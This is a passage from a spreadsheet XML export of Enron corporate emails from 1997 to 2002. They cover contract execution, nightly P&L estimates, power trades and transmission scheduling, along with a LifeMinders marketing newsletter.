and Enovate and Enron.  They are both being routed internally prior to_x000D_
execution.  However, due to the "Notices" section missing from the Enovate_x000D_
contract, Legal has asked that I forward that to you for execution prior to_x000D_
Reliant's execution.  I hope that this is not a problem._x000D_
_x000D_
Dan, I don't want this contract to get misdirected, Enron's so large and_x000D_
that could easily happen.  Could you please send me your direct mailing_x000D_
address so that I may send it directly to you for your further handling?_x000D_
Thanks, I appreciate so much your help in getting these two agreements_x000D_
completed._x000D_
_x000D_
YOu can either call me or email me your direct mailing address and I'll_x000D_
send you the Enovate contract as soon as I receive it._x000D_
_x000D_
Thank you,_x000D_
Ellen_x000D_
713.207.3266_x000D_
ellen_r_dailey@reliantenergy.com_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Jul 1997 01:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Lou Pai's staff meeting, 25C3.</t>
  </si>
  <si>
    <t>_x000D_
Hartsoe: PJM, Hogan,SPP, WSCC,Hebert,democratic nominee, ACA_x000D_
Andy Rotherham AAE membership (703)875-0764_x000D_
Gordon Weil_x000D_
page Maureen</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 18:18:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.ermis@enron.com', 'p..south@enron.com', 'k..allen@enron.com', 'jason.wolfe@enron.com', 'l..gay@enron.com', 'matt.smith@enron.com', 'jay.reitmeyer@enron.com', 'tori.kuykendall@enron.com', 'matthew.lenhart@enron.com'})</t>
  </si>
  <si>
    <t>P&amp;L estimates</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
In an effort to smooth out some of the problems we have seen in the past, I would like to start getting a P&amp;L estimate from each of you nightly to try to prevent any unnecessary surprises in the mornings.  I will then expect my group to contact you before they leave at night if it is above or below your estimates, or range you give them.  _x000D_
_x000D_
This will certainly help us all avoid any fire drills the next day. _x000D_
_x000D_
If you have any concerns about this please let me know, otherwise, your book admins will be calling you or stopping by your desks around 3:00 daily to get this estimate. _x000D_
_x000D_
Thanks,_x000D_
Kam_x000D_
_x000D_
x3-5781_x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 06:23:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lifeminders.com@mailgate.lifeminders.com'})</t>
  </si>
  <si>
    <t>Judy, Keep Your Holidays Debt-Free</t>
  </si>
  <si>
    <t xml:space="preserve">JUDY'S WORK &amp; MONEY LIFEMINDERS FOR 11/22/2000_x000D_
_x000D_
IN THE SPOTLIGHT_x000D_
_x000D_
* Shoppers, Debt-Proof Your Holidays_x000D_
* Career Advantage: Your Inner Self Revealed_x000D_
_x000D_
MY PORTFOLIO_x000D_
_x000D_
* Win $5000 and Get Organized for the Holidays!_x000D_
_x000D_
THE LIGHTER SIDE_x000D_
_x000D_
* DILBERT -- The Short List: Top 10 Greeting Cards You'd Like to Send for=_x000D_
=20_x000D_
Boss's Day_x000D_
_x000D_
INTERACTIVE LIFEMINDERS_x000D_
_x000D_
* Real Estate Wealth-Builder_x000D_
_x000D_
-----------------------------------------------------------_x000D_
_x000D_
_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
IN THE SPOTLIGHT_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
_x000D_
SHOPPERS, DEBT-PROOF YOUR HOLIDAYS_x000D_
_x000D_
They're back -- the holidays, that is. It's already time for another round =_x000D_
of=20_x000D_
fun, celebrating, and shopping! That's right, the holiday gifft-buying seas=_x000D_
on=20_x000D_
kicks into high gear Friday. But before you and your credit cards hit the=_x000D_
=20_x000D_
malls, consider these smart tips for keeping your gift-giving expenses in=_x000D_
=20_x000D_
line and preventing post-holiday credit card shocks._x000D_
http://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116104&amp;=_x000D_
pr=3D924&amp;cf=3D1_x000D_
&amp;pa=3D0&amp;e=3DS_x000D_
_x000D_
***COOL STUFF***_x000D_
Judy, Gateway is giving away a new computer every day. Click here to visit=_x000D_
=20_x000D_
Gateway.com &amp; enter to win._x000D_
http://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116478&amp;=_x000D_
pr=3D924&amp;cf=3D1_x000D_
&amp;pa=3D0&amp;e=3DS_x000D_
_x000D_
_x000D_
-Highlights-_x000D_
CAREER ADVANTAGE: YOUR INNER SELF REVEALED_x000D_
_x000D_
Using your strengths and compensating for your weaknesses are great ways to=_x000D_
=20_x000D_
get ahead in your career. So how do you determine what those great qualitie=_x000D_
s=20_x000D_
are? Find out with this free career report. It could give you a better=20_x000D_
understanding of your ambitions, motivations and talents. And it could be t=_x000D_
he=20_x000D_
guide you need to reflect on your important career decisions._x000D_
http://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116106&amp;=_x000D_
pr=3D924&amp;cf=3D1_x000D_
&amp;pa=3D0&amp;e=3DS_x000D_
_x000D_
***COOL STUFF***_x000D_
Get the latest book from Tom Clancy, Sidney Sheldon, or other favorites for=_x000D_
=20_x000D_
FREE! Click for details._x000D_
http://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116488&amp;=_x000D_
pr=3D924&amp;cf=3D1_x000D_
&amp;pa=3D0&amp;e=3DS_x000D_
_x000D_
_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
MY PORTFOLIO_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
_x000D_
-AccountMinder-_x000D_
WIN $5000 AND GET ORGANIZED FOR THE HOLIDAYS!_x000D_
_x000D_
Sign up for LifeMinders AccountMinder and you could win $5000!_x000D_
_x000D_
AccountMinder organizes all of your account information whenever you want,=_x000D_
=20_x000D_
and it's FREE!  Just plug in your secure password and there's no more waiti=_x000D_
ng=20_x000D_
for monthly bills &amp; statements in the mail. Sign up by December 15th for yo=_x000D_
ur=20_x000D_
chance to win $5000 for the holidays._x000D_
_x000D_
http://www.lfmn.com/LifeMinder30/Int/AcctMind/acctmind.asp?cont_id=3D108665=_x000D_
&amp;emai_x000D_
l=3Djudy.hernandez@enron.com&amp;prod_run=3D878&amp;uid=3D602737979&amp;vc=3D8496&amp;signi=_x000D_
n=3D1&amp;first_n_x000D_
ame=3DJudy&amp;last_name=3DHernandez&amp;zip_code=3DYour Postal Code_x000D_
_x000D_
_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
THE LIGHTER SIDE_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D_x000D_
_x000D_
DILBERT -- THE SHORT LIST: TOP 10 GREETING CARDS YOU'D LIKE TO SEND FOR=20_x000D_
BOSS'S DAY_x000D_
_x000D_
From the pages of www.dilbert.com_x000D_
_x000D_
THE SHORT LIST_x000D_
_x000D_
Top 10 Greeting Cards You'd Like to Send for Boss's Day_x000D_
_x000D_
1. Get Smart Soon_x000D_
- Anonymous_x000D_
_x000D_
2. Roses are red, violets are blue. When the @#$% do I get last year's ?rev=_x000D_
iew??- Far behind the cost of living??3. I thought I'd send you candy or ma=_x000D_
ybe some roses/Instead I've got the ?negatives of you in embarrassing poses=_x000D_
! (I get my raise WHEN?)?- Miltonburro-bert??4. I just want to let you know=_x000D_
 how much I appreciate you. But I really need ?the job.?- Hmm??5. Happy Bos=_x000D_
s's day! You've won a one way trip to Siberia for the Really ?Interesting T=_x000D_
echnology Show.?- And don't come back??=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D??***COOL DEAL***??"#1 Online Broker=_x000D_
age" (Kiplinger's), $9.95 Trades @ Wingspan Investment ?Services!?http://ww=_x000D_
1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D7&amp;c=3D116565&amp;pr=3D924&amp;=_x000D_
cf=3D1?&amp;pa=3D0&amp;e=3DS???=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D??6. Roses are red, violets are blue. We know what =_x000D_
WE'RE doing, wish you had a ?clue.?- Outaherebert??7. Roses are red, violet=_x000D_
s are black./ Please take the job offer/ and do not ?come back.?- Dorothy_b=_x000D_
ut_not_from_Kansas??8. Roses are red, violets are blue, one of us is a moro=_x000D_
n, and I think it's ?you.?- Benbert??9. Your incessant buzzwords, I never w=_x000D_
ill miss. I'm giving my notice. ?Synergize *this.*?- Birdbert??10. We decid=_x000D_
ed the entire department should band together and do something ?extravagant=_x000D_
 to celebrate your administrative talents...WE QUIT!?- Drone??=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D??Vote on Today's List?h=_x000D_
ttp://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D2&amp;c=3D116565&amp;p=_x000D_
r=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS??Submit Entries for Upcoming Topics?http://ww1=_x000D_
.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D3&amp;c=3D116565&amp;pr=3D924&amp;c=_x000D_
f=3D1?&amp;pa=3D0&amp;e=3DS??Future topics include:?11/26/2000 Things you wish your=_x000D_
 boss would spend time on?11/27/2000 Best signs to hang outside your cubicl=_x000D_
e ?=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D??&gt;&gt;&gt;CLIC=_x000D_
K BELOW?   Www.dilbert.com?http://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=_x000D_
=3D8496&amp;url=3D1&amp;c=3D116565&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS??***COOL STUFF***?=_x000D_
We need Your City residents' opinions=01(And they could be worth $1000!?htt=_x000D_
p://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116935&amp;pr=_x000D_
=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS? =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D?INTERACTIVE MINDERS?=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=_x000D_
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D??Tax Advantages of a New Home?http:=_x000D_
//ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116115&amp;pr=3D=_x000D_
924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS??Money-Saving Mortgage Options?http://ww1.lfmn.com=_x000D_
/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D2&amp;c=3D116115&amp;pr=3D924&amp;cf=3D1?&amp;pa=_x000D_
=3D0&amp;e=3DS??How Much House Can You Afford??http://ww1.lfmn.com/actv/sr2.asp=_x000D_
?u=3D602737979&amp;v=3D8496&amp;url=3D3&amp;c=3D116115&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS???=_x000D_
?-----------------------------------------------------------?**ADVERTISEMEN=_x000D_
TS**??Make More Trades for Less - Wingspan Investment Services has been Rat=_x000D_
ed #1 ?Online Brokerage by Kiplinger's! Click now to take advantage of our =_x000D_
4 Star ?Customer Service and $9.95 Trades!?http://ww1.lfmn.com/actv/sr2.asp=_x000D_
?u=3D602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116375&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS??G=_x000D_
et your FREE CD.  Pick one CD NOW and get up to 10 more CDs FREE with ?memb=_x000D_
ership.  That=01,s 11 FREE CDs total.?http://ww1.lfmn.com/actv/sr2.asp?u=3D=_x000D_
602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116418&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS??Are yo=_x000D_
u paying too much for your Health Insurance?  Click here for a FREE ?quote =_x000D_
to see if you can save $$$!?http://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;=_x000D_
v=3D8496&amp;url=3D1&amp;c=3D116399&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS??Want to find dea=_x000D_
ls on office supplies?  Click here and start saving!?http://ww1.lfmn.com/ac=_x000D_
tv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116419&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D=_x000D_
0&amp;e=3DS??You can earn 5% CASH BACK at select online merchants everytime you=_x000D_
 use the ?Etrade Platinum Visac card.  Apply today for intro 2.9% APR.?http=_x000D_
://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116429&amp;pr=_x000D_
=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS??FREE CDs... FREE CDs...Order FREE CDs from BMG=_x000D_
 Music Service! Get 12 CDs for ?the price of 1, with nothing more to buy, e=_x000D_
ver! It's that simple.?http://ww1.lfmn.com/actv/sr2.asp?u=3D602737979&amp;v=3D8=_x000D_
496&amp;url=3D1&amp;c=3D116396&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS??---------------------=_x000D_
--------------------------------------??JUDY'S TOOLS??Improve My Work &amp; Mon=_x000D_
ey LifeMinders?http://www.lfmn.com/LifeMinder30/GoldII/Index.asp?uid=3D6027=_x000D_
37979&amp;vc=3D8496&amp;pr=3D5&amp;t?r=3Detswea??Sign Me Up for Another Category?http:/=_x000D_
/www.lfmn.com/LifeMinder30/AdXfert/index.asp?uid=3D602737979&amp;vc=3D8496&amp;tr=_x000D_
=3Det?swea??Tell a Friend?http://www.lfmn.com/fnf/friendsfamily.asp?uid=3D6=_x000D_
02737979&amp;vc=3D8496&amp;mktg=3DLANY31??Change My Registration Information?http:/=_x000D_
/www.lfmn.com/LifeMinder30/GoldII/Index.asp?uid=3D602737979&amp;vc=3D8496&amp;pr=3D=_x000D_
0&amp;t?r=3Detswea??Send Questions mailto:info@lifeminders.com???LifeMinders Wo=_x000D_
rk &amp; Money is sponsored by:??WIN great prizes or up to $1,000,000 cash when=_x000D_
 you play online games! Click ?here.?http://ww1.lfmn.com/actv/sr2.asp?u=3D6=_x000D_
02737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116431&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS?Get 4 bo=_x000D_
oks for $4. Click for details.?http://ww1.lfmn.com/actv/sr2.asp?u=3D6027379=_x000D_
79&amp;v=3D8496&amp;url=3D1&amp;c=3D116441&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS?Lose 10 Pounds=_x000D_
 in 5 Weeks with eDiets.com!?http://ww1.lfmn.com/actv/sr2.asp?u=3D602737979=_x000D_
&amp;v=3D8496&amp;url=3D1&amp;c=3D116442&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS?InsWeb - Where Y=_x000D_
ou and Your Insurance Really Click!?http://ww1.lfmn.com/actv/sr2.asp?u=3D60=_x000D_
2737979&amp;v=3D8496&amp;url=3D1&amp;c=3D116443&amp;pr=3D924&amp;cf=3D1?&amp;pa=3D0&amp;e=3DS????Your e=_x000D_
-mail address on record with LifeMinders is judy.hernandez@enron.com.??Ques=_x000D_
tions? Comments? Suggestions?  Please help us respond to your requests and?=_x000D_
input by writing to us at: info@lifeminders.com instead of replying to this=_x000D_
?message (we sent this to you from a "send-only" mailbox).??LifeMinders e-m=_x000D_
ails are never sent unsolicited. LifeMinders only sends e-mails?to register=_x000D_
ed members. If you would like to unsubscribe from only the?LifeMinders Work=_x000D_
 &amp; Money product, you can send an email to ?unsubscribe-work@lifeminders.co=_x000D_
m?or you may click below.?http://www.lfmn.com/lifeminder30/GoldII/Index.asp=_x000D_
?uid=3D602737979&amp;vc=3D8496&amp;pr=3D101?&amp;tr=3Deerwea??To unsubscribe from all L=_x000D_
ifeMinders products send email to ?unsubscribe-all@lifeminders.com.??Copyri=_x000D_
ght , 2000 LifeMinders, Inc.  All Rights Reserved.  For complete terms ?and=_x000D_
?conditions of use, see:  http://www.lfmn.com/privacy/terms.html??Lifeminde=_x000D_
rs, Inc. is a publicly traded company, Nasdaq: LFMN.  Click below for?inves=_x000D_
tor relations.  http://www.lfmn.com/investors/index.asp?? </t>
  </si>
  <si>
    <t>Fri, 10 Nov 2000 01:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lance.cunningham@enron.com'})</t>
  </si>
  <si>
    <t>Re: Transmission Report 2000</t>
  </si>
  <si>
    <t>Lance Cunningham</t>
  </si>
  <si>
    <t xml:space="preserve">Lance,_x000D_
_x000D_
Please, ask Shirley to order._x000D_
_x000D_
Vince_x000D_
_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 11/10/2000 _x000D_
09:16 AM ---------------------------_x000D_
_x000D_
_x000D_
Lance Cunningham@ENRON on 11/09/2000 06:16:43 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Transmission Report 2000  _x000D_
_x000D_
I think that this report would be of interest and would be useful._x000D_
_x000D_
Lance_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 02:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'awenda2000@cs.com'})</t>
  </si>
  <si>
    <t>Test</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 08:46:50 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'collonges@enron.com'})</t>
  </si>
  <si>
    <t>ENA trades</t>
  </si>
  <si>
    <t>John, _x000D_
_x000D_
As per our conversation yesterday, I suggest that we put the two trades that you closed with us in January (25 MW baseload swap, 1 year, Feb. 01 to Jan 02) back on the MTM books and give you simultaneously the opportunity to close these positions.  Our prices for  June 01 - Jan 02 swap rates are as follows:_x000D_
_x000D_
Argentina power $18.50 - $20.40 per MWh (this is a bid-offer spread in US dollars; you are currently long)_x000D_
Brazil power R$425 - R$475 per MWh (this is a bid-offer spread in reais; you are currently short);_x000D_
_x000D_
We are also making sure that there will be no adverse tax impact for Enron._x000D_
_x000D_
Please let me know if you agree to close these positions._x000D_
_x000D_
Remi</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 04:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Republicans Press Conference---Alternative to MOU</t>
  </si>
  <si>
    <t>The centerpiece of the press conference was the letter to Senator Burton_x000D_
and Assemblyman Hertzberg from Senator Brulte and Assemblyman Cox which we_x000D_
faxed out last week.  I will fax out the additional documents momentarily._x000D_
_x000D_
Scott_x000D_
_x000D_
Jeff.Dasovich@enron.com wrote:_x000D_
_x000D_
&gt; Anybody listen in on the press conference?  Anything of note?  Thanks._x000D_
&gt;_x000D_
&gt; Best,_x000D_
&gt; Jeff</t>
  </si>
  <si>
    <t>Tue, 6 Mar 2001 00:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'holli.krebs@enron.com'})</t>
  </si>
  <si>
    <t>Confirm Letters - Grant County</t>
  </si>
  <si>
    <t>I've got one more deal that Houston says they haven't received a signed _x000D_
confirm letter for - 420529. Stephanie Piwetz says she spoke to Grant County _x000D_
and they said they already sent out that one and 432854, but haven't received _x000D_
them back from us......???? Do you know where they are?_x000D_
_x000D_
Kate_x000D_
_x000D_
_x000D_
(From 2/26/01)_x000D_
Just something to keep in mind - _x000D_
The confirms group in Houston is waiting on signed confirm letters from Grant _x000D_
County for the following three deals -_x000D_
_x000D_
432854_x000D_
420554_x000D_
420563_x000D_
_x000D_
I've let Stephanie Piwetz and Sharen Cason know that you'll forward the _x000D_
letters on to them once you receive them. Or you can give them to me and I'll _x000D_
fax them over. Keep me posted on the progress._x000D_
_x000D_
Thanks,_x000D_
Kate</t>
  </si>
  <si>
    <t>Thu, 31 May 2001 13:56:33 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'tom.parker@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'dl-ets_pfp@enron.com'})</t>
  </si>
  <si>
    <t>Project Status Report</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Attached is the Monthly Project Status Report._x000D_
_x000D_
Note:  The page set up is designed to print landscape on 8-1/2 X 14 legal paper. _x000D_
_x000D_
  </t>
  </si>
  <si>
    <t>Wed, 11 Apr 2001 16:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/11/2001 01:18 PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp. - Europe  From:  Kirstee Hewitt                           03/28/2001 12:41 PM	_x000D_
		_x000D_
_x000D_
_x000D_
To:	Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:	Viacheslav Danilov/LON/ECT@ECT, Tanya Tamarchenko/HOU/ECT@ECT _x000D_
Subject:	VaR doc - London_x000D_
_x000D_
Hi Vince,_x000D_
As we discussed last week here is the VaR doc that I had originally started at Xmas and has since been expanded with Stig's and Tanya's help._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
We  would be very grateful for your comments._x000D_
Cheers_x000D_
Kirstee_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Jun 2001 10:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'louise.kitchen@enron.com', 'wes.colwell@enron.com', 'jeffrey.mcmahon@enron.com', 'jeffrey.shankman@enron.com', 'ken.rice@enron.com', 'john.lavorato@enron.com', 'janet.dietrich@enron.com', 'david.delainey@enron.com', 'mike.mcconnell@enron.com', 'jim.fallon@enron.com', 'greg.whalley@enron.com', 'gary.hickerson@enron.com'})</t>
  </si>
  <si>
    <t>Drift Allocation update</t>
  </si>
  <si>
    <t xml:space="preserve">The following is a status update regarding the agreed upon decision to _x000D_
allocate Drift to the Business Units on April 26, 2001:_x000D_
_x000D_
 A methodology and systems reporting have been developed and an analysis _x000D_
prepared for the period Jan 2001 - April 2001.  During May, discussions were _x000D_
held with each of the business units regarding the methodolgy which applies _x000D_
to all business units and the analysis of results for Jan- April.  _x000D_
_x000D_
A request was made to begin the Drift Allocation process from April 2001.  _x000D_
_x000D_
During this week, we are meeting with the business units to review April and _x000D_
May numbers and processes.  We are expecting to allocate April and May to the _x000D_
individual business unit's Drift lines next week.   _x000D_
_x000D_
June numbers will be accumulated on the DPR in an Intra-Month Allocated Drift _x000D_
line and allocated on the last business day's DPR to the Business Unit._x000D_
_x000D_
 Please do not hesitate to call me, 3-3210,  or the representatives of your _x000D_
business unit,  if you require additional information._x000D_
_x000D_
Sheila_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Mar 2001 11:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'valarie.sabo@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'stacey.white@enron.com', 'tim.belden@enron.com'})</t>
  </si>
  <si>
    <t>reminder re: mapping COB S/N and NOB S/N</t>
  </si>
  <si>
    <t xml:space="preserve">I should mention that Basis  pt. 22 is off of R8_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Valarie Sabo/PDX/ECT on 03/08/2001 09:20 _x000D_
PM ---------------------------_x000D_
From: Valarie Sabo on 03/08/2001 07:10 PM_x000D_
To: Stacey W White/HOU/ECT@ECT, Tim Belden/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: reminder re: mapping COB S/N and NOB S/N_x000D_
_x000D_
I think we all decided that COB S/N and NOB S/N should become a basis point _x000D_
unto themselves.  Remapping the S/N  has not been thoroughly explored _x000D_
regarding implications to existing deals and has not been re-mapped in table _x000D_
edit nor has a basis point been created.  Currently COB S/N and COB N/S = R8; _x000D_
and NOB S/N = Basis Pt #22 which is also what NOB N/S is mapped as.  We'll _x000D_
probably only appreciate the revaluation on a shoulder month basis, but I _x000D_
believe it is material._x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 07:34:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'dan.hyvl@enron.com', 'mark.powell@enron.com', 'mary.cook@enron.com', 'debra.perlingiere@enron.com'})</t>
  </si>
  <si>
    <t>Engage</t>
  </si>
  <si>
    <t xml:space="preserve">To All;_x000D_
_x000D_
Please see the attached spreadsheet.  I have outlined the contracts, _x000D_
thresholds, guarantor and guaranty amounts.  Please verify this information _x000D_
and let me know where we stand on each of the contracts._x000D_
_x000D_
Thanks_x000D_
_x000D_
Russell_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 01:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.elliott@enron.com', 'edmund.cooper@enron.com'})</t>
  </si>
  <si>
    <t>India:  derivatives</t>
  </si>
  <si>
    <t>Mark:  ENA is looking into derivatives trading with an Indian corporate.  My _x000D_
latest information is the opinion from 1/14/97 rendered by Crawford Bayley &amp; _x000D_
Co. (which was part of our global survey effort a few years ago).  Do you _x000D_
have anything more recent?  The ENA inquiry came from the pulp and paper _x000D_
group.  Thanks for your help.  Sara</t>
  </si>
  <si>
    <t>Mon, 28 May 2001 13:46:29 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
[IMAGE]  You've been invited to view Beth's photos!  [IMAGE]	_x000D_
_x000D_
_x000D_
    [IMAGE]  [IMAGE]  [IMAGE]   [IMAGE]    [IMAGE]   [IMAGE]   [IMAGE]1 of 35 photos  [IMAGE]  [IMAGE]     Great News! Beth wants to share these special photos with you! It's easy and fun to view Beth's photo album at Ofoto.        To view all of the photos, click here .   You can order high-quality prints of these photos. If you aren't an Ofoto member, join for FREE and get 15 free prints!     	_x000D_
   If you can not see the links above, copy and paste the following URL directly into your browser: http://www.ofoto.com/I.jsp?m=48242973103&amp;n=1423894604     If you have any questions, please contact the Ofoto Customer Support Team.  Email: service@ofoto.com Phone (US/Canada): 800-360-9098   Fax: 510-450-0120 Phone (All Others): 510-229-1175   	_x000D_
</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 13:07:22 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'h..douglas@enron.com'})</t>
  </si>
  <si>
    <t>Project NOLly</t>
  </si>
  <si>
    <t xml:space="preserve">As mentioned during our phone call, the attached diagram illustrates the manner in which the ENE net operating loss was compartmentalized.  SHD._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 01:47:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Platts Offensive?</t>
  </si>
  <si>
    <t>How could they justify going after only electronic traded deals. Wouldn't _x000D_
they need to attack all deals done ever using a Platt's price as a reference _x000D_
price ? Good Luck..</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 03:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Willamette BOM Sale</t>
  </si>
  <si>
    <t>Real Time Traders,_x000D_
_x000D_
The Services Desk has sold 10 Mw of Willamette Ind. energy, Balance of the _x000D_
Month, to Avista/WWP, On Peak,  beginning 12/4 through 12/30. The energy is _x000D_
unit contingent power  at the WWP system. I have placed copies of the tags _x000D_
and oasis requests in the Services Books. _x000D_
_x000D_
I have purchased PacifiCorp Firm transmission to move from the Willamette _x000D_
Busbar to the BPA system interconnect. Then Snohomish network transmission to _x000D_
move from PacifiCorp's system to Avista's system._x000D_
_x000D_
I have requested that Willamette give Enron a phone number to allow us to _x000D_
communicate Real Time with their generation staff. I will pass this along _x000D_
when it's received. _x000D_
_x000D_
Although the schedule is unit contingent I would like to make a reasonable _x000D_
effort to keep the schedule whole when Willamette has unit problems. If we _x000D_
can show that this energy is a reasonably reliable energy source it will open _x000D_
up future opportunities. If there are curtailments call Pac Transmission at _x000D_
503-251-5230, Snohomish Transmission at 425-304-1620 and WWP at 509-495-8534 _x000D_
and inform them of the cut and whatever resupply source that maybe used. _x000D_
_x000D_
Feel free to call me at home (503-579-1615) or on my Cell (503-807-2826) if _x000D_
there are ever any questions._x000D_
_x000D_
Les Rawson</t>
  </si>
  <si>
    <t>Wed, 6 Mar 2002 14:34:43 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'robin.panzer@enron.com'})</t>
  </si>
  <si>
